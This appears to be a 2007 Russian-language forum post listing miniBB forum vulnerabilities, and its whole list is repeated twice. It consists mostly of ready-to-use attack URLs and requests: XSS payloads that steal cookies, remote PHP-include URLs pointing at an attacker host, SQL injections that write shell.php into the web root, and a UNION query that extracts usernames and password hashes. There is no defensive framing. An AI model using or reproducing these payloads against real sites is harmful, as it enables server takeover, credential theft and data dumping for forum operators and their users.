-=lebed=-
06.11.2007, 16:30
Обзор уязвимостей в miniBB
1. XSS miniBB<=1.7
Уязвимость в проверке правильности входных данных. Удаленный пользователь может выполнить XSS нападение.
http://[site]"></a><script> somejavascriptcode</script>
http://[site]"></a><script> alert(document.cookie)</script>
2. Удаленное выполнение произвольного php кода (php-инклуд) в MiniBB<=1.7
Уязвимость позволяет удаленному пользователю выполнить произвольные команды на целевой системе.
http://[target]/[path_to_minibb]/index.php? includeFooter=http://[attacker]
http://[target]/[path_to_minibb]/bb_admin.php? includeFooter=ht tp://[attacker]
3.SQL-inj в miniBB 2.0 RC6a, возможно более ранние версии.
a) Уязвимость существует из-за недостаточной обработки входных данных в параметрах confirmCode и post в сценарии index.php. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные SQL команды в базе данных приложения.
http://[target]/[path_to_minibb]/index.php?action=confirmpasswd&confirmCode=f' union select '' from mysql.user INTO OUTFILE
'/var/www/html/shell.php'/*
http://[target]/[path_to_minibb]/index.php?action=delmsg&post=1' union select 1,1 from mysql.user INTO OUTFILE '/tmp/passwd'/*
http://[target]/[path_to_minibb]/index.php?action=editmsg&post=1' union select 1,1 from mysql.user INTO OUTFILE '/tmp/passwd'/*
б) Уязвимость существует из-за недостаточной обработки входных данных в параметрах “user_usr”, “email” и “login”. Удаленный пользователь может с помощью специально сформированного POST запроса выполнить произвольные SQL команды в базе данных приложения.
user_usr=f' union select '','123' from mysql.user INTO OUTFILE '/var/www/html/shell.php'/*
http://[target]/[path_to_minibb]/index.php?action=sendpass&email=f' union select 0,0,'' from mysql.user INTO OUTFILE '/var/www/html/shell.php'/*
http://[target]/[path_to_minibb]/index.php?action=registernew&login||email=1' union select 1 from mysql.user INTO OUTFILE '/tmp/passwd'/*
в) Уязвимость существует из-за недостаточной обработки входных данных в параметре “queryStr”. Удаленный пользователь может с помощью специально сформированного POST запроса выполнить произвольный код сценарий в браузере жертвы в контексте безопасности уязвимого сайта.
POST /index.php?sortBy=1 HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Host: minibb.local:80
Content-Length: 91
Connection: Close
user_usr=1&user_pwd=1&mode=login&queryStr=">&pagetype=index
4.Удаленное выполнение произвольного php кода (php-инклуд) в miniBB<=2.02
а) Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре "pathToFiles" сценарием bb_func_txt.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.
http://site/bb_func_txt.php?pathToFiles=$shell
б) Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре "pathToFiles" в сценарии index.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.
http://www.example.com/[Script_Path]/index.php?pathToFiles=Shell.txt?
5.Удаленное выполнение произвольного php кода (php-инклуд) в miniBB<=2.05
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в поле language. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.
Эксплоит: http://www.xakep.ru/post/38631/MiniBB-Forum-Remote-Exploit.txt
6.SQL-inj в miniBB<=2.1, возможно более ранние версии.
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «table» сценарием index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
http://site/index.php?action=search&where=3 &searchGo=1& table=minibbtable_posts/**/LIMIT/**/0/**/UNION/**/SELECT/**/hex(concat(username, 0x20,user_password))/**/FROM/**/minibbtable_users/* */WHERE/**/user_id=1/*
1. XSS miniBB<=1.7
Уязвимость в проверке правильности входных данных. Удаленный пользователь может выполнить XSS нападение.
http://[site]"></a><script> somejavascriptcode</script>
http://[site]"></a><script> alert(document.cookie)</script>
2. Удаленное выполнение произвольного php кода (php-инклуд) в MiniBB<=1.7
Уязвимость позволяет удаленному пользователю выполнить произвольные команды на целевой системе.
http://[target]/[path_to_minibb]/index.php? includeFooter=http://[attacker]
http://[target]/[path_to_minibb]/bb_admin.php? includeFooter=ht tp://[attacker]
3.SQL-inj в miniBB 2.0 RC6a, возможно более ранние версии.
a) Уязвимость существует из-за недостаточной обработки входных данных в параметрах confirmCode и post в сценарии index.php. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные SQL команды в базе данных приложения.
http://[target]/[path_to_minibb]/index.php?action=confirmpasswd&confirmCode=f' union select '' from mysql.user INTO OUTFILE
'/var/www/html/shell.php'/*
http://[target]/[path_to_minibb]/index.php?action=delmsg&post=1' union select 1,1 from mysql.user INTO OUTFILE '/tmp/passwd'/*
http://[target]/[path_to_minibb]/index.php?action=editmsg&post=1' union select 1,1 from mysql.user INTO OUTFILE '/tmp/passwd'/*
б) Уязвимость существует из-за недостаточной обработки входных данных в параметрах “user_usr”, “email” и “login”. Удаленный пользователь может с помощью специально сформированного POST запроса выполнить произвольные SQL команды в базе данных приложения.
user_usr=f' union select '','123' from mysql.user INTO OUTFILE '/var/www/html/shell.php'/*
http://[target]/[path_to_minibb]/index.php?action=sendpass&email=f' union select 0,0,'' from mysql.user INTO OUTFILE '/var/www/html/shell.php'/*
http://[target]/[path_to_minibb]/index.php?action=registernew&login||email=1' union select 1 from mysql.user INTO OUTFILE '/tmp/passwd'/*
в) Уязвимость существует из-за недостаточной обработки входных данных в параметре “queryStr”. Удаленный пользователь может с помощью специально сформированного POST запроса выполнить произвольный код сценарий в браузере жертвы в контексте безопасности уязвимого сайта.
POST /index.php?sortBy=1 HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Host: minibb.local:80
Content-Length: 91
Connection: Close
user_usr=1&user_pwd=1&mode=login&queryStr=">&pagetype=index
4.Удаленное выполнение произвольного php кода (php-инклуд) в miniBB<=2.02
а) Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре "pathToFiles" сценарием bb_func_txt.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.
http://site/bb_func_txt.php?pathToFiles=$shell
б) Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре "pathToFiles" в сценарии index.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.
http://www.example.com/[Script_Path]/index.php?pathToFiles=Shell.txt?
5.Удаленное выполнение произвольного php кода (php-инклуд) в miniBB<=2.05
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в поле language. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.
Эксплоит: http://www.xakep.ru/post/38631/MiniBB-Forum-Remote-Exploit.txt
6.SQL-inj в miniBB<=2.1, возможно более ранние версии.
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «table» сценарием index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
http://site/index.php?action=search&where=3 &searchGo=1& table=minibbtable_posts/**/LIMIT/**/0/**/UNION/**/SELECT/**/hex(concat(username, 0x20,user_password))/**/FROM/**/minibbtable_users/* */WHERE/**/user_id=1/*